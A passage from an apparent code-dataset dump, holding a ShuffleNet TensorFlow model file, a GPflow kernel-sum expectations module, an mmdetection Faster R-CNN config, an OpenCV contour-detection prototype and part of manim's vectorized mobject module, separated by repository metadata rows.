Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=1, width_scale=1.0, model_name="shufflenet_g1_w1", **kwargs)
def shufflenet_g2_w1(**kwargs):
"""
ShuffleNet 1x (g=2) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=2, width_scale=1.0, model_name="shufflenet_g2_w1", **kwargs)
def shufflenet_g3_w1(**kwargs):
"""
ShuffleNet 1x (g=3) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=3, width_scale=1.0, model_name="shufflenet_g3_w1", **kwargs)
def shufflenet_g4_w1(**kwargs):
"""
ShuffleNet 1x (g=4) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=4, width_scale=1.0, model_name="shufflenet_g4_w1", **kwargs)
def shufflenet_g8_w1(**kwargs):
"""
ShuffleNet 1x (g=8) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=8, width_scale=1.0, model_name="shufflenet_g8_w1", **kwargs)
def shufflenet_g1_w3d4(**kwargs):
"""
ShuffleNet 0.75x (g=1) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile
Devices,' https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=1, width_scale=0.75, model_name="shufflenet_g1_w3d4", **kwargs)
def shufflenet_g3_w3d4(**kwargs):
"""
ShuffleNet 0.75x (g=3) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile
Devices,' https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=3, width_scale=0.75, model_name="shufflenet_g3_w3d4", **kwargs)
def shufflenet_g1_wd2(**kwargs):
"""
ShuffleNet 0.5x (g=1) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile
Devices,' https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=1, width_scale=0.5, model_name="shufflenet_g1_wd2", **kwargs)
def shufflenet_g3_wd2(**kwargs):
"""
ShuffleNet 0.5x (g=3) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile
Devices,' https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=3, width_scale=0.5, model_name="shufflenet_g3_wd2", **kwargs)
def shufflenet_g1_wd4(**kwargs):
"""
ShuffleNet 0.25x (g=1) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile
Devices,' https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=1, width_scale=0.25, model_name="shufflenet_g1_wd4", **kwargs)
def shufflenet_g3_wd4(**kwargs):
"""
ShuffleNet 0.25x (g=3) model from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile
Devices,' https://arxiv.org/abs/1707.01083.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.tensorflow/models'
Location for keeping the model parameters.
Returns
-------
functor
Functor for model graph creation with extra fields.
"""
return get_shufflenet(groups=3, width_scale=0.25, model_name="shufflenet_g3_wd4", **kwargs)
def _test():
import numpy as np
from .model_store import init_variables_from_state_dict
pretrained = False
models = [
shufflenet_g1_w1,
shufflenet_g2_w1,
shufflenet_g3_w1,
shufflenet_g4_w1,
shufflenet_g8_w1,
shufflenet_g1_w3d4,
shufflenet_g3_w3d4,
shufflenet_g1_wd2,
shufflenet_g3_wd2,
shufflenet_g1_wd4,
shufflenet_g3_wd4,
]
for model in models:
net = model(pretrained=pretrained)
x = tf.placeholder(
dtype=tf.float32,
shape=(None, 3, 224, 224),
name='xx')
y_net = net(x)
weight_count = np.sum([np.prod(v.get_shape().as_list()) for v in tf.trainable_variables()])
print("m={}, {}".format(model.__name__, weight_count))
assert (model != shufflenet_g1_w1 or weight_count == 1531936)
assert (model != shufflenet_g2_w1 or weight_count == 1733848)
assert (model != shufflenet_g3_w1 or weight_count == 1865728)
assert (model != shufflenet_g4_w1 or weight_count == 1968344)
assert (model != shufflenet_g8_w1 or weight_count == 2434768)
assert (model != shufflenet_g1_w3d4 or weight_count == 975214)
assert (model != shufflenet_g3_w3d4 or weight_count == 1238266)
assert (model != shufflenet_g1_wd2 or weight_count == 534484)
assert (model != shufflenet_g3_wd2 or weight_count == 718324)
assert (model != shufflenet_g1_wd4 or weight_count == 209746)
assert (model != shufflenet_g3_wd4 or weight_count == 305902)
with tf.Session() as sess:
if pretrained:
init_variables_from_state_dict(sess=sess, state_dict=net.state_dict)
else:
sess.run(tf.global_variables_initializer())
x_value = np.zeros((1, 3, 224, 224), np.float32)
y = sess.run(y_net, feed_dict={x: x_value})
assert (y.shape == (1, 1000))
tf.reset_default_graph()
if __name__ == "__main__":
_test()
| 29.355224
| 120
| 0.604179
|
4f98dcd1e83d700520739875761a33678eeef589
| 3,682
|
py
|
Python
|
gpflow/expectations/sums.py
|
antonykamp/GPflow
|
1831a5d19a50ff525af0ce931c8b82f6306d8196
|
[
"Apache-2.0"
] | 1,724
|
2016-01-21T18:10:26.000Z
|
2022-03-22T20:03:57.000Z
|
gpflow/expectations/sums.py
|
antonykamp/GPflow
|
1831a5d19a50ff525af0ce931c8b82f6306d8196
|
[
"Apache-2.0"
] | 1,713
|
2016-02-26T13:09:35.000Z
|
2022-03-31T14:39:30.000Z
|
gpflow/expectations/sums.py
|
antonykamp/GPflow
|
1831a5d19a50ff525af0ce931c8b82f6306d8196
|
[
"Apache-2.0"
] | 519
|
2016-02-17T19:04:45.000Z
|
2022-03-26T00:13:13.000Z
|
# Copyright 2017-2020 The GPflow Contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
from functools import reduce
import tensorflow as tf
from .. import kernels
from .. import mean_functions as mfn
from ..inducing_variables import InducingPoints
from ..probability_distributions import DiagonalGaussian, Gaussian, MarkovGaussian
from . import dispatch
from .expectations import expectation
NoneType = type(None)
@dispatch.expectation.register(Gaussian, kernels.Sum, NoneType, NoneType, NoneType)
def _E(p, kernel, _, __, ___, nghp=None):
r"""
Compute the expectation:
<\Sum_i diag(Ki_{X, X})>_p(X)
- \Sum_i Ki_{.,.} :: Sum kernel
:return: N
"""
exps = [expectation(p, k, nghp=nghp) for k in kernel.kernels]
return reduce(tf.add, exps)
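# Usage sketch (the names below are illustrative assumptions, not defined here):
# with p = Gaussian(mu, cov) and k = kernels.Sum([kernels.SquaredExponential(),
# kernels.Linear()]), calling expectation(p, k) evaluates <diag(Ki_{X,X})>_p for
# each summand and adds the results, returning a length-N tensor.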
@dispatch.expectation.register(Gaussian, kernels.Sum, InducingPoints, NoneType, NoneType)
def _E(p, kernel, inducing_variable, _, __, nghp=None):
r"""
Compute the expectation:
<\Sum_i Ki_{X, Z}>_p(X)
- \Sum_i Ki_{.,.} :: Sum kernel
:return: NxM
"""
exps = [expectation(p, (k, inducing_variable), nghp=nghp) for k in kernel.kernels]
return reduce(tf.add, exps)
@dispatch.expectation.register(
Gaussian, (mfn.Linear, mfn.Identity, mfn.Constant), NoneType, kernels.Sum, InducingPoints
)
def _E(p, mean, _, kernel, inducing_variable, nghp=None):
r"""
Compute the expectation:
expectation[n] = <m(x_n)^T (\Sum_i Ki_{x_n, Z})>_p(x_n)
- \Sum_i Ki_{.,.} :: Sum kernel
:return: NxQxM
"""
exps = [expectation(p, mean, (k, inducing_variable), nghp=nghp) for k in kernel.kernels]
return reduce(tf.add, exps)
@dispatch.expectation.register(MarkovGaussian, mfn.Identity, NoneType, kernels.Sum, InducingPoints)
def _E(p, mean, _, kernel, inducing_variable, nghp=None):
r"""
Compute the expectation:
expectation[n] = <x_{n+1} (\Sum_i Ki_{x_n, Z})>_p(x_{n:n+1})
- \Sum_i Ki_{.,.} :: Sum kernel
:return: NxDxM
"""
exps = [expectation(p, mean, (k, inducing_variable), nghp=nghp) for k in kernel.kernels]
return reduce(tf.add, exps)
@dispatch.expectation.register(
(Gaussian, DiagonalGaussian), kernels.Sum, InducingPoints, kernels.Sum, InducingPoints
)
def _E(p, kern1, feat1, kern2, feat2, nghp=None):
r"""
Compute the expectation:
expectation[n] = <(\Sum_i K1_i_{Z1, x_n}) (\Sum_j K2_j_{x_n, Z2})>_p(x_n)
- \Sum_i K1_i_{.,.}, \Sum_j K2_j_{.,.} :: Sum kernels
:return: NxM1xM2
"""
crossexps = []
if kern1 == kern2 and feat1 == feat2: # avoid duplicate computation by using transposes
for i, k1 in enumerate(kern1.kernels):
crossexps.append(expectation(p, (k1, feat1), (k1, feat1), nghp=nghp))
for k2 in kern1.kernels[:i]:
eKK = expectation(p, (k1, feat1), (k2, feat2), nghp=nghp)
eKK += tf.linalg.adjoint(eKK)
crossexps.append(eKK)
else:
for k1, k2 in itertools.product(kern1.kernels, kern2.kernels):
crossexps.append(expectation(p, (k1, feat1), (k2, feat2), nghp=nghp))
return reduce(tf.add, crossexps)
| 33.472727
| 99
| 0.670831
|
a6f7fd0476e869140aee2eda369ad3116a08d82f
| 5,712
|
py
|
Python
|
configs/fp16/faster_rcnn_r34_fpn_fp16_1x.py
|
moshes7/mmdetection
|
6e3c30d89e80ada4c84cc06bb6b216584e31cb3e
|
[
"Apache-2.0"
] | null | null | null |
configs/fp16/faster_rcnn_r34_fpn_fp16_1x.py
|
moshes7/mmdetection
|
6e3c30d89e80ada4c84cc06bb6b216584e31cb3e
|
[
"Apache-2.0"
] | null | null | null |
configs/fp16/faster_rcnn_r34_fpn_fp16_1x.py
|
moshes7/mmdetection
|
6e3c30d89e80ada4c84cc06bb6b216584e31cb3e
|
[
"Apache-2.0"
] | null | null | null |
# fp16 settings
fp16 = dict(loss_scale=512.)
# model settings
model = dict(
type='FasterRCNN',
pretrained='torchvision://resnet34',
backbone=dict(
type='ResNet',
depth=34,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='FPN',
# in_channels=[256, 512, 1024, 2048],
# out_channels=256,
in_channels=[64, 128, 256, 512],
out_channels=256, # 64 ???
num_outs=5),
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHead',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=81,
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)))
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=-1,
add_gt_as_proposals=False),
allowed_border=0,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False))
test_cfg = dict(
rpn=dict(
nms_across_levels=False,
nms_pre=1000,
nms_post=1000,
max_num=1000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
score_thr=0.05, nms=dict(type='nms', iou_thr=0.5), max_per_img=100)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)
)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
# dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='Resize', img_scale=(640, 480), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
# img_scale=(1333, 800),
img_scale=(640, 480),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=20,
# workers_per_gpu=1,
workers_per_gpu=6,
# imgs_per_gpu=2,
# workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
# optimizer
optimizer = dict(type='SGD', lr=0.02, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
# step=[8, 11])
# step=[28, 31])
step=[5, 7])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
# total_epochs = 12
# total_epochs = 24 + 8
total_epochs = 8
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/faster_rcnn_r34_fpn_fp16_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
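# Typical launch (an assumption based on the standard mmdetection workflow, not
# something specified in this config):
#     python tools/train.py configs/fp16/faster_rcnn_r34_fpn_fp16_1x.py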
| 30.222222
| 78
| 0.590861
|
8378b3ccaf0072021284bc1682f6e595ba7ebd05
| 5,964
|
py
|
Python
|
prototypes/src/contour.py
|
alexandru-dinu/ir-project
|
70f3bed0b89770729a977fa4c8111ba806932bde
|
[
"MIT"
] | null | null | null |
prototypes/src/contour.py
|
alexandru-dinu/ir-project
|
70f3bed0b89770729a977fa4c8111ba806932bde
|
[
"MIT"
] | 1
|
2019-04-15T12:10:51.000Z
|
2019-05-30T14:35:17.000Z
|
prototypes/src/contour.py
|
alexandru-dinu/ir-project
|
70f3bed0b89770729a977fa4c8111ba806932bde
|
[
"MIT"
] | null | null | null |
import argparse
import warnings
from scipy.interpolate import splev, splprep
from utils import *
warnings.filterwarnings("ignore")
parser = argparse.ArgumentParser()
parser.add_argument("--file", type=str)
parser.add_argument("--interp", type=int, default=20)
parser.add_argument("--save", action="store_true")
args = parser.parse_args()
def save_or_show(img, suffix=""):
if args.save:
name = args.file.split("/")[-1].split(".")[0]
save_img(img, name=f"../out/out-{name}{suffix}.png", from_bgr=True)
else:
show(img, from_bgr=True)
def smooth_contour(cnt, num=25):
x, y = cnt.T
x = x.tolist()[0]
y = y.tolist()[0]
# find the B-spline representation of the contour
tck, u = splprep([x, y], u=None, s=1.0, per=1)
u_new = np.linspace(u.min(), u.max(), num)
# evaluate spline given points and knots
x_new, y_new = splev(u_new, tck, der=0)
s_cnt = np.array(list(zip(x_new, y_new))).astype(np.int)
return s_cnt
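# separate_contours keeps the two longest contours and labels them left/right by
# comparing the median x-coordinate of their points.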
def separate_contours(contours):
assert len(contours) >= 2
contours = sorted(contours, key=lambda x: len(x), reverse=True)
contours = contours[:2]
w0s = np.median([e[0][0] for e in contours[0]])
w1s = np.median([e[0][0] for e in contours[1]])
idx_left = 0 if w0s < w1s else 1
idx_right = 1 - idx_left
cnt_l = np.transpose(contours[idx_left], (0, 2, 1)).squeeze() # size = N x 2
cnt_r = np.transpose(contours[idx_right], (0, 2, 1)).squeeze() # size = N x 2
# cnt_l = smooth_contour(contours[idx_left], num=args.interp)
# cnt_r = smooth_contour(contours[idx_right], num=args.interp)
return cnt_l, cnt_r
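# get_middle_line rasterizes the left and right contours separately, then for
# every image row places a single pixel halfway between the right edge of the
# left contour and the left edge of the right contour; the result is closed
# morphologically before being returned.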
def get_middle_line(img):
assert img[img == 1].size + img[img == 0].size == img.size
# show(img)
h, w = img.shape
out_l = np.zeros((h, w), dtype=np.uint8)
out_r = np.zeros((h, w), dtype=np.uint8)
out = np.zeros((h, w), dtype=np.uint8)
_, contours, _ = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
# print(f"Found {len(contours)} contours")
cnt_l, cnt_r = separate_contours(contours)
cv2.drawContours(out_l, [cnt_l], 0, 1, thickness=1)
cv2.drawContours(out_r, [cnt_r], 0, 1, thickness=1)
for i in range(h):
ll = np.argwhere(out_l[i, :] == 1)
rr = np.argwhere(out_r[i, :] == 1)
# FIXME
# if ll.size == 0 and rr.size > 0:
# out[i, rr[0] // 2] = 1
# if ll.size > 0 and rr.size == 0:
# out[i, ll[-1] * 2] = 1
# --
if ll.size > 0 and rr.size > 0:
pl, pr = ll[-1], rr[0]
m = abs(pr - pl) // 2
out[i, pl + m] = 1
out = morph_close(out, num_iter=1)
# show(out + img)
return out
def on_video():
capture = cv2.VideoCapture(args.file)
assert capture.isOpened()
fps = capture.get(cv2.CAP_PROP_FPS)
__plot = None
count = 0
while capture.isOpened():
ret, img = capture.read()
count += 1
if count == 180:
return
# if ret and count % 2 != 1:
# continue
sf = 4
h, w, c = img.shape
img = cv2.resize(img, (int(h / sf), int(w / sf)))
# hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(
img, lowerb=np.array([150, 150, 150]), upperb=np.array([255, 255, 255])
)
# show(mask)
mask = cv2.GaussianBlur(mask, ksize=(5, 5), sigmaX=2)
edges = cv2.Canny(mask, threshold1=10, threshold2=30)
edges = morph_close(edges, num_iter=1)
edges = np.divide(edges, 255).astype(np.uint8)
# show(edges)
mid_line = get_middle_line(edges)
ps = np.argwhere(mid_line == 1)
for (x, y) in ps:
cv2.circle(img, (y, x), 1, (0, 255, 0), thickness=-1)
cv2.imshow("out", img)
cv2.waitKey(1)
continue
# play
b = img[:, :, 0]
g = img[:, :, 1]
r = img[:, :, 2]
img = np.dstack((r, g, b))
if __plot is None:
__plot = plt.imshow(img)
else:
__plot.set_data(img)
plt.pause(1 / fps)
plt.draw()
def with_hough(img, edges):
lines = cv2.HoughLines(edges, rho=1, theta=np.pi / 180.0, threshold=70)
thr = 30.0
for i, line in enumerate(lines):
rho, theta = line[0]
if (thr / 180) * np.pi < theta < ((180.0 - thr) / 180) * np.pi:
print(f"[{i}]SKIP theta: {theta * 180.0 / np.pi}")
continue
print(f"[{i}]OK theta: {theta * 180.0 / np.pi}")
a = np.cos(theta)
b = np.sin(theta)
x0 = a * rho
y0 = b * rho
x1 = int(x0 + 1000 * (-b))
y1 = int(y0 + 1000 * (a))
x2 = int(x0 - 1000 * (-b))
y2 = int(y0 - 1000 * (a))
cv2.line(img, (x1, y1), (x2, y2), (0, 255, 0), 2)
save_or_show(img, suffix="-hough")
def on_image(img=None):
img = open_img(args.file, gray=False)
h, w, c = img.shape
sf = 6.3 # scale factor: scale original image to 640x480
img = cv2.resize(img, (int(h / sf), int(w / sf)))
# hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(
img, lowerb=np.array([150, 150, 150]), upperb=np.array([255, 255, 255])
)
# show(mask)
mask = cv2.GaussianBlur(mask, ksize=(5, 5), sigmaX=2)
edges = cv2.Canny(mask, threshold1=80, threshold2=120)
edges = morph_close(edges, num_iter=1)
# show(edges); return
if True:
with_hough(img, edges)
return
edges = np.divide(edges, 255).astype(np.uint8)
# show(edges)
mid_line = get_middle_line(edges)
ps = np.argwhere(mid_line == 1)
for (x, y) in ps:
cv2.circle(img, (y, x), 1, (0, 255, 0), thickness=-1)
# show(img, from_bgr=True)
save_or_show(img)
def main():
if "jpg" in args.file:
on_image()
elif "mp4" in args.file:
on_video()
if __name__ == "__main__":
main()
| 25.706897
| 84
| 0.55332
|
1263b71e4c6e9d66cb7718d4a83edf2c14d02232
| 67,738
|
py
|
Python
|
manim/mobject/types/vectorized_mobject.py
|
janLuke/manim
|
18bab2075f7c9987cbba7b173c3b02971b78a560
|
[
"MIT"
] | 1
|
2021-07-03T14:18:38.000Z
|
2021-07-03T14:18:38.000Z
|
manim/mobject/types/vectorized_mobject.py
|
janLuke/manim
|
18bab2075f7c9987cbba7b173c3b02971b78a560
|
[
"MIT"
] | 3
|
2020-07-14T02:46:11.000Z
|
2020-09-09T15:15:55.000Z
|
manim/mobject/types/vectorized_mobject.py
|
janLuke/manim
|
18bab2075f7c9987cbba7b173c3b02971b78a560
|
[
"MIT"
] | null | null | null |
"""Mobjects that use vector graphics."""
__all__ = [
"VMobject",
"VGroup",
"VDict",
"VectorizedPoint",
"CurvesAsSubmobjects",
"DashedVMobject",
]
import itertools as it
import sys
import typing
from abc import ABCMeta
from typing import Optional, Sequence, Union
import colour
import numpy as np
from PIL.Image import Image
from ... import config
from ...constants import *
from ...mobject.mobject import Mobject
from ...mobject.three_d_utils import get_3d_vmob_gradient_start_and_end_points
from ...utils.bezier import (
bezier,
get_smooth_handle_points,
integer_interpolate,
interpolate,
partial_bezier_points,
)
from ...utils.color import BLACK, WHITE, color_to_rgba
from ...utils.iterables import make_even, stretch_array_to_length, tuplify
from ...utils.simple_functions import clip_in_place
from ...utils.space_ops import rotate_vector, shoelace_direction
from .opengl_vectorized_mobject import OpenGLVMobject
# TODO
# - Change cubic curve groups to have 4 points instead of 3
# - Change sub_path idea accordingly
# - No more mark_paths_closed, instead have the camera test
# if last point in close to first point
# - Think about length of self.points. Always 0 or 1 mod 4?
# That's kind of weird.
class MetaVMobject(ABCMeta):
"""Metaclass for initializing corresponding classes as either inheriting from
VMobject or OpenGLVMobject, depending on the value of ``config.renderer`` at
initialization time.
Note that with this implementation, changing the value of ``config.renderer``
after Manim has been imported won't have the desired effect and will lead to
spurious errors.
"""
def __new__(cls, name, bases, namespace):
if len(bases) == 0:
if config.renderer == "opengl":
bases = (OpenGLVMobject,)
else:
bases = (VMobject,)
return super().__new__(cls, name, bases, namespace)
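# Illustrative consequence of the metaclass above (a sketch, not code from this
# module): a class declared with no explicit bases, e.g.
#
#     class MyShape(metaclass=MetaVMobject):
#         ...
#
# inherits from OpenGLVMobject when config.renderer == "opengl" at class-creation
# time, and from VMobject otherwise.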
class VMobject(Mobject):
def __init__(
self,
fill_color=None,
fill_opacity=0.0,
stroke_color=None,
stroke_opacity=1.0,
stroke_width=DEFAULT_STROKE_WIDTH,
# The purpose of background stroke is to have
# something that won't overlap the fill, e.g.
# For text against some textured background
background_stroke_color=BLACK,
background_stroke_opacity=1.0,
background_stroke_width=0,
# When a color c is set, there will be a second color
        # computed by interpolating c toward WHITE with
        # sheen_factor, and the fill will be displayed as a gradient
        # toward this secondary color in the direction of sheen_direction.
sheen_factor=0.0,
sheen_direction=UL,
# Indicates that it will not be displayed, but
# that it should count in parent mobject's path
close_new_points=False,
pre_function_handle_to_anchor_scale_factor=0.01,
make_smooth_after_applying_functions=False,
background_image=None,
shade_in_3d=False,
# This is within a pixel
# TODO, do we care about accounting for
# varying zoom levels?
tolerance_for_point_equality=1e-6,
n_points_per_cubic_curve=4,
**kwargs,
):
self.fill_color = fill_color
self.fill_opacity = fill_opacity
self.stroke_color = stroke_color
self.stroke_opacity = stroke_opacity
self.stroke_width = stroke_width
self.background_stroke_color = background_stroke_color
self.background_stroke_opacity = background_stroke_opacity
self.background_stroke_width = background_stroke_width
self.sheen_factor = sheen_factor
self.sheen_direction = sheen_direction
self.close_new_points = close_new_points
self.pre_function_handle_to_anchor_scale_factor = (
pre_function_handle_to_anchor_scale_factor
)
self.make_smooth_after_applying_functions = make_smooth_after_applying_functions
self.background_image = background_image
self.shade_in_3d = shade_in_3d
self.tolerance_for_point_equality = tolerance_for_point_equality
self.n_points_per_cubic_curve = n_points_per_cubic_curve
Mobject.__init__(self, **kwargs)
def get_group_class(self):
return VGroup
# Colors
def init_colors(self, propagate_colors=True):
self.set_fill(
color=self.fill_color or self.color,
opacity=self.fill_opacity,
family=propagate_colors,
)
self.set_stroke(
color=self.stroke_color or self.color,
width=self.stroke_width,
opacity=self.stroke_opacity,
family=propagate_colors,
)
self.set_background_stroke(
color=self.background_stroke_color,
width=self.background_stroke_width,
opacity=self.background_stroke_opacity,
family=propagate_colors,
)
self.set_sheen(
factor=self.sheen_factor,
direction=self.sheen_direction,
family=propagate_colors,
)
if not propagate_colors:
for submobject in self.submobjects:
submobject.init_colors(propagate_colors=False)
return self
def generate_rgbas_array(self, color, opacity):
"""
First arg can be either a color, or a tuple/list of colors.
Likewise, opacity can either be a float, or a tuple of floats.
If self.sheen_factor is not zero and only
one color was passed in, a second, slightly lighter color
will automatically be added for the gradient.
"""
colors = list(tuplify(color))
opacities = list(tuplify(opacity))
rgbas = np.array(
[color_to_rgba(c, o) for c, o in zip(*make_even(colors, opacities))]
)
sheen_factor = self.get_sheen_factor()
if sheen_factor != 0 and len(rgbas) == 1:
light_rgbas = np.array(rgbas)
light_rgbas[:, :3] += sheen_factor
clip_in_place(light_rgbas, 0, 1)
rgbas = np.append(rgbas, light_rgbas, axis=0)
return rgbas
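# A hedged illustration of the sheen behaviour described in the docstring
# above (the numbers are hypothetical, not taken from the library): with a
# single color and sheen_factor = 0.2, a second, slightly lighter RGBA row
# is appended and later rendered as a gradient.
#
#   rgbas       -> [[0.1, 0.2, 0.3, 1.0]]
#   light_rgbas -> [[0.3, 0.4, 0.5, 1.0]]   # rgb channels + 0.2, clipped to [0, 1]
#   result      -> [[0.1, 0.2, 0.3, 1.0], [0.3, 0.4, 0.5, 1.0]]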
def update_rgbas_array(self, array_name, color=None, opacity=None):
passed_color = color if (color is not None) else BLACK
passed_opacity = opacity if (opacity is not None) else 0
rgbas = self.generate_rgbas_array(passed_color, passed_opacity)
if not hasattr(self, array_name):
setattr(self, array_name, rgbas)
return self
# Match up current rgbas array with the newly calculated
# one. 99% of the time they'll be the same.
curr_rgbas = getattr(self, array_name)
if len(curr_rgbas) < len(rgbas):
curr_rgbas = stretch_array_to_length(curr_rgbas, len(rgbas))
setattr(self, array_name, curr_rgbas)
elif len(rgbas) < len(curr_rgbas):
rgbas = stretch_array_to_length(rgbas, len(curr_rgbas))
# Only update rgb if color was not None, and only
# update alpha channel if opacity was passed in
if color is not None:
